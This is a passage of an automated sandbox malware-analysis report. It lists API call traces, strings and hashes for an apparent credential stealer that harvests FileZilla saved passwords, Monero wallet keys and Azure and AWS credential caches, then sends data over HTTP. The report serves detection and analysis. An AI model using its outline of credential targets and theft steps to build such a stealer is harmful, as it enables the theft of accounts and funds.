                                  • Instruction ID: 7a9177bd6b886bd0cfe442e1e727a9182a9dfdafef9d3e18fb39feb6c54b6477
                                  • Opcode Fuzzy Hash: d83b425242d520ecb14da747347d40b6955fe28bc0522a88b2da4b6bc8420bcb
                                  • Instruction Fuzzy Hash: 35612AB250C210EFD304BE19DD8567BB7E7EF84B10F258A2DE6C297704E2315A429783
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b025a6b6d369ea65981be0b758f74bd7185d62219f500135eb94683c95f58bbd
                                  • Instruction ID: e112adcf4c654e6181430aa6762fb6fa6dd09951869d2f54901f958e00305623
                                  • Opcode Fuzzy Hash: b025a6b6d369ea65981be0b758f74bd7185d62219f500135eb94683c95f58bbd
                                  • Instruction Fuzzy Hash: EF4146F3E487148FE3086E28DC8436AF3E5EB94720F2B063DDAC987780D97958418786
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c11c02784eaf5cc06a7e11935a4579317f732b1bd78c362719e7e2796568d11b
                                  • Instruction ID: 7d424379a747c1ed619b3bf7d9e1503fd0b29fa2290d6e163a9c30a17e3ae2ba
                                  • Opcode Fuzzy Hash: c11c02784eaf5cc06a7e11935a4579317f732b1bd78c362719e7e2796568d11b
                                  • Instruction Fuzzy Hash: 0C3169B251C304AFE749AF29D88267EFBE5FF58350F168D2DE2C5C2660E2359440CA57
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 18c4f9fb5e0ccad51b3ef2d759728d95341b1e2e74178417e57466cc843b7d12
                                  • Instruction ID: b37702d64b14b490fe1a5c16193c9385f041ec0ae585e05b169db9fe78059432
                                  • Opcode Fuzzy Hash: 18c4f9fb5e0ccad51b3ef2d759728d95341b1e2e74178417e57466cc843b7d12
                                  • Instruction Fuzzy Hash: D0310CB240C704AFD345BF29D882A6AFBE4FF58710F06892DE2D582610E3759481CB93
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 00248DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00248E0B
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 002399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002399EC
                                    • Part of subcall function 002399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00239A11
                                    • Part of subcall function 002399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00239A31
                                    • Part of subcall function 002399C0: ReadFile.KERNEL32(000000FF,?,00000000,0023148F,00000000), ref: 00239A5A
                                    • Part of subcall function 002399C0: LocalFree.KERNEL32(0023148F), ref: 00239A90
                                    • Part of subcall function 002399C0: CloseHandle.KERNEL32(000000FF), ref: 00239A9A
                                    • Part of subcall function 00248E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00248E52
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00250DBA,00250DB7,00250DB6,00250DB3), ref: 00240362
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00240369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00240385
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 00240393
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 002403CF
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 002403DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00240419
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 00240427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00240463
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 00240475
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 00240502
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 0024051A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 00240532
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 0024054A
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00240562
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00240571
                                  • lstrcat.KERNEL32(?,url: ), ref: 00240580
                                  • lstrcat.KERNEL32(?,00000000), ref: 00240593
                                  • lstrcat.KERNEL32(?,00251678), ref: 002405A2
                                  • lstrcat.KERNEL32(?,00000000), ref: 002405B5
                                  • lstrcat.KERNEL32(?,0025167C), ref: 002405C4
                                  • lstrcat.KERNEL32(?,login: ), ref: 002405D3
                                  • lstrcat.KERNEL32(?,00000000), ref: 002405E6
                                  • lstrcat.KERNEL32(?,00251688), ref: 002405F5
                                  • lstrcat.KERNEL32(?,password: ), ref: 00240604
                                  • lstrcat.KERNEL32(?,00000000), ref: 00240617
                                  • lstrcat.KERNEL32(?,00251698), ref: 00240626
                                  • lstrcat.KERNEL32(?,0025169C), ref: 00240635
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 0024068E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: d0fc8b7039e49e3eb9ce6a54e880583f1332c76e2a785340e5db4e4a03137c50
                                  • Instruction ID: fc0b72bd097b3bc883d825dcc3ea4f45936495c3e45e3dd5631ecf62603211f3
                                  • Opcode Fuzzy Hash: d0fc8b7039e49e3eb9ce6a54e880583f1332c76e2a785340e5db4e4a03137c50
                                  • Instruction Fuzzy Hash: 4CD13F72960108ABDB08FBF0DD96EEE733CEF54301F404518F506A6091DE74AA6ACF66
                                  APIs
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 002347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00234839
                                    • Part of subcall function 002347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00234849
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002359F8
                                  • StrCmpCA.SHLWAPI(?,0104FCA0), ref: 00235A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00235B93
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0104FBC0,00000000,?,0104E830,00000000,?,00251A1C), ref: 00235E71
                                  • lstrlen.KERNEL32(00000000), ref: 00235E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00235E93
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00235E9A
                                  • lstrlen.KERNEL32(00000000), ref: 00235EAF
                                  • lstrlen.KERNEL32(00000000), ref: 00235ED8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00235EF1
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00235F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00235F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00235F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00235FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00235FBD
                                  • HttpOpenRequestA.WININET(00000000,0104FD20,?,0104F3F8,00000000,00000000,00400100,00000000), ref: 00235BF8
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00235FC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: 397c48b4b0068ecb50ae2fa26138d9ea16d1f8646ccb765916b5941725f2d534
                                  • Instruction ID: bbf664d7457c7456efcf52c802e17d1fd52eb5a10c17e40ac55ad3de5c8ab762
                                  • Opcode Fuzzy Hash: 397c48b4b0068ecb50ae2fa26138d9ea16d1f8646ccb765916b5941725f2d534
                                  • Instruction Fuzzy Hash: 8212E171870118ABEB19EBA0DC96FEEB378FF54700F5041A9F10A62091EF706A59CF65
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 00248B60: GetSystemTime.KERNEL32(00250E1A,0104EC50,002505AE,?,?,002313F9,?,0000001A,00250E1A,00000000,?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 00248B86
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0023CF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0023D0C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0023D0CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 0023D208
                                  • lstrcat.KERNEL32(?,00251478), ref: 0023D217
                                  • lstrcat.KERNEL32(?,00000000), ref: 0023D22A
                                  • lstrcat.KERNEL32(?,0025147C), ref: 0023D239
                                  • lstrcat.KERNEL32(?,00000000), ref: 0023D24C
                                  • lstrcat.KERNEL32(?,00251480), ref: 0023D25B
                                  • lstrcat.KERNEL32(?,00000000), ref: 0023D26E
                                  • lstrcat.KERNEL32(?,00251484), ref: 0023D27D
                                  • lstrcat.KERNEL32(?,00000000), ref: 0023D290
                                  • lstrcat.KERNEL32(?,00251488), ref: 0023D29F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0023D2B2
                                  • lstrcat.KERNEL32(?,0025148C), ref: 0023D2C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 0023D2D4
                                  • lstrcat.KERNEL32(?,00251490), ref: 0023D2E3
                                    • Part of subcall function 0024A820: lstrlen.KERNEL32(00234F05,?,?,00234F05,00250DDE), ref: 0024A82B
                                    • Part of subcall function 0024A820: lstrcpy.KERNEL32(00250DDE,00000000), ref: 0024A885
                                  • lstrlen.KERNEL32(?), ref: 0023D32A
                                  • lstrlen.KERNEL32(?), ref: 0023D339
                                    • Part of subcall function 0024AA70: StrCmpCA.SHLWAPI(01048A08,0023A7A7,?,0023A7A7,01048A08), ref: 0024AA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 0023D3B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: 6ce65089820a3299b1e4a870d0e994a3488131bc389e70b4613a3725805fe6f7
                                  • Instruction ID: 47dadfd92db1bf2170be9b60c16154ce043b643c1f3df4e85b97790899a6f6e1
                                  • Opcode Fuzzy Hash: 6ce65089820a3299b1e4a870d0e994a3488131bc389e70b4613a3725805fe6f7
                                  • Instruction Fuzzy Hash: D3E12E71960108ABDB08FBA0DD96EEE7378FF54301F104168F50BA6091DE35AE69CF66
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0104D7C0,00000000,?,0025144C,00000000,?,?), ref: 0023CA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0023CA89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0023CA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0023CAA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0023CAD9
                                  • StrStrA.SHLWAPI(?,0104D880,00250B52), ref: 0023CAF7
                                  • StrStrA.SHLWAPI(00000000,0104DA90), ref: 0023CB1E
                                  • StrStrA.SHLWAPI(?,0104E448,00000000,?,00251458,00000000,?,00000000,00000000,?,010488D8,00000000,?,00251454,00000000,?), ref: 0023CCA2
                                  • StrStrA.SHLWAPI(00000000,0104E708), ref: 0023CCB9
                                    • Part of subcall function 0023C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0023C871
                                    • Part of subcall function 0023C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0023C87C
                                  • StrStrA.SHLWAPI(?,0104E708,00000000,?,0025145C,00000000,?,00000000,010489A8), ref: 0023CD5A
                                  • StrStrA.SHLWAPI(00000000,01048AA8), ref: 0023CD71
                                    • Part of subcall function 0023C820: lstrcat.KERNEL32(?,00250B46), ref: 0023C943
                                    • Part of subcall function 0023C820: lstrcat.KERNEL32(?,00250B47), ref: 0023C957
                                    • Part of subcall function 0023C820: lstrcat.KERNEL32(?,00250B4E), ref: 0023C978
                                  • lstrlen.KERNEL32(00000000), ref: 0023CE44
                                  • CloseHandle.KERNEL32(00000000), ref: 0023CE9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 3277df19ab2114f90b5fe27850666b3e25e94135158505bd76af6ea0c63df07f
                                  • Instruction ID: 66d309ddacaffd086b0e0dcc71c6b3b9a987618858dd188e80eeceb2888b8cbb
                                  • Opcode Fuzzy Hash: 3277df19ab2114f90b5fe27850666b3e25e94135158505bd76af6ea0c63df07f
                                  • Instruction Fuzzy Hash: 47E11171960108ABEB18EBA0DC96FEEB778EF54300F404169F50677191DF306A6ACF66
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • RegOpenKeyExA.ADVAPI32(00000000,0104BA50,00000000,00020019,00000000,002505B6), ref: 002483A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00248426
                                  • wsprintfA.USER32 ref: 00248459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0024847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0024848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00248499
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: beaa982b2598f5ef8cfb6d06e1bff33d2afa472c111f89bc54c2761dad5a3dd3
                                  • Instruction ID: c6c09a6af82728d05ca5e844da30e3196cc8d9589370b227b60f2fa4a002d385
                                  • Opcode Fuzzy Hash: beaa982b2598f5ef8cfb6d06e1bff33d2afa472c111f89bc54c2761dad5a3dd3
                                  • Instruction Fuzzy Hash: 3F811D71960118ABEB28DF54CC91FEEB7B8FF48704F008298E109A6180DF716B99CF95
                                  APIs
                                    • Part of subcall function 00248DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00248E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00244DB0
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00244DCD
                                    • Part of subcall function 00244910: wsprintfA.USER32 ref: 0024492C
                                    • Part of subcall function 00244910: FindFirstFileA.KERNEL32(?,?), ref: 00244943
                                  • lstrcat.KERNEL32(?,00000000), ref: 00244E3C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00244E59
                                    • Part of subcall function 00244910: StrCmpCA.SHLWAPI(?,00250FDC), ref: 00244971
                                    • Part of subcall function 00244910: StrCmpCA.SHLWAPI(?,00250FE0), ref: 00244987
                                    • Part of subcall function 00244910: FindNextFileA.KERNEL32(000000FF,?), ref: 00244B7D
                                    • Part of subcall function 00244910: FindClose.KERNEL32(000000FF), ref: 00244B92
                                  • lstrcat.KERNEL32(?,00000000), ref: 00244EC8
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00244EE5
                                    • Part of subcall function 00244910: wsprintfA.USER32 ref: 002449B0
                                    • Part of subcall function 00244910: StrCmpCA.SHLWAPI(?,002508D2), ref: 002449C5
                                    • Part of subcall function 00244910: wsprintfA.USER32 ref: 002449E2
                                    • Part of subcall function 00244910: PathMatchSpecA.SHLWAPI(?,?), ref: 00244A1E
                                    • Part of subcall function 00244910: lstrcat.KERNEL32(?,0104FB90), ref: 00244A4A
                                    • Part of subcall function 00244910: lstrcat.KERNEL32(?,00250FF8), ref: 00244A5C
                                    • Part of subcall function 00244910: lstrcat.KERNEL32(?,?), ref: 00244A70
                                    • Part of subcall function 00244910: lstrcat.KERNEL32(?,00250FFC), ref: 00244A82
                                    • Part of subcall function 00244910: lstrcat.KERNEL32(?,?), ref: 00244A96
                                    • Part of subcall function 00244910: CopyFileA.KERNEL32(?,?,00000001), ref: 00244AAC
                                    • Part of subcall function 00244910: DeleteFileA.KERNEL32(?), ref: 00244B31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: d4c379eba668d3fc44064a9644a7c252cdc847eebff393f963ac6acf9ac008c2
                                  • Instruction ID: f8ecbdec03fdd5e2814d5bb7775abf44e37107492836aad8be8afdd9c22e37d1
                                  • Opcode Fuzzy Hash: d4c379eba668d3fc44064a9644a7c252cdc847eebff393f963ac6acf9ac008c2
                                  • Instruction Fuzzy Hash: 254183BA96020866D754F760EC47FED3238AB64701F404894BA49660C2EEB057FC8F92
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0024906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
